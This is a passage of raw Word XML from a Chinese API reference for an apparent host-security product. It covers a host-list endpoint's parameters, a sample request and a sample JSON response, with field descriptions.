            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E0071FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="594896D7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F34BB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AB8D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D55F8A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76313845" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60AA87C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CFA5F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blockingSwitch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491F2290" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A7DD7BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CA36F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拦截记录开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="164221B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0926C68A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blockingState</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9B644A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="776341A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35DA642F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拦截记录状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B1FF0F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021322C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blackStrategyEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3329C47F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64640950" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC63659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启黑名单开关, true-是，false-否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="636B03B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AB690" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>list?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA6A6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392000A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "63042b6fc7de70f2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onlineStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "10.0.2.15",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIpBak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ips</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": ["192.168.56.105", "fe80::94c1:b476:6605:a0e6", "10.0.2.15", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"fe80::4fd9:7a78:5b7c:e3ea"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"group": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>licai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tags": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcSyncNum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcNotSyncNum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accessControlMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": "CentOS Linux release 7.9.2009 (Core)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protectService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>limitOut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blockingSwitch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"available": "yes",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>availableReason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osPlatform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blackStrategyEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13183FB3"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2177"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EB3A28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450751E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA9D77D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37BCBD36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01155713" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6FBE36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E0DFED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EFB7DC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DE8CE49" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABA1938" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40663E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D72F334" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="024A5F5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573E896E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152B22AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32DDCE91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A485EBB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A38CEE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIpBak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706600CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1439D90C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>匹配</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2032B81E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1566D659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ips</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2539C077" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33996E8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机所有</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65692C52" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54CE26C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B24589" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
